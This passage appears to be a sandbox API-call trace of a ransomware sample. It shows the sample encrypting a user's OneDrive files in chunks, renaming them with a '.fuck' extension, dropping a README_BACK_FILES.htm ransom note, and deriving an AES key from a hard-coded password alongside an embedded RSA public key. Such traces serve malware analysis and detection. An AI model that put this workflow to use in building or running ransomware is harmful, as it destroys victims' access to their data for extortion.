lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.197] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.197] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.197] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.197] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.197] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.197] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.198] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.198] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.198] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.198] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.198] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.198] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.199] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.199] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.199] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.199] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.199] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.199] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.200] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.200] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.200] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.200] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.200] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.200] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.201] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0280.201] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0280.201] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0280.201] CloseHandle (hObject=0x5d3c) returned 1 [0280.201] CloseHandle (hObject=0x5d48) returned 1 [0280.201] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0280.208] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0280.208] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0280.258] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0280.259] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0280.259] CryptDestroyKey (hKey=0x2fb688) returned 1 [0280.259] CryptReleaseContext (hProv=0x2f1e2b0, dwFlags=0x0) returned 1 [0280.260] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0280.260] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0280.260] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\readme_back_files.htm")) returned 0xffffffff [0280.260] AreFileApisANSI () returned 1 [0280.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0280.260] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0280.261] GetFileType (hFile=0x5d4c) returned 0x1 [0280.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0280.262] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.262] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.262] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.350] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.351] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0280.351] GetLastError () returned 0x0 [0280.351] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\loadingpage.html")) returned 0x20 [0280.351] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html", dwFileAttributes=0x80) returned 1 [0280.352] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\loadingpage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0280.353] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\loadingpage.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0280.401] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html.gsg", dwFileAttributes=0x2) returned 1 [0280.401] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0280.404] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0280.404] lstrlenA (lpString="TXNdkJRdVYjLbGOsIhrFFzdHzMlQm") returned 29 [0280.404] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0280.404] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0280.404] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0280.404] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0280.404] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f2ddf8) returned 1 [0280.404] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2ddf8, dwCertEncodingType=0x1, pInfo=0x2f374a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f374d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f374d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fb688) returned 1 [0280.404] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0280.405] CryptEncrypt (in: hKey=0x2fb688, 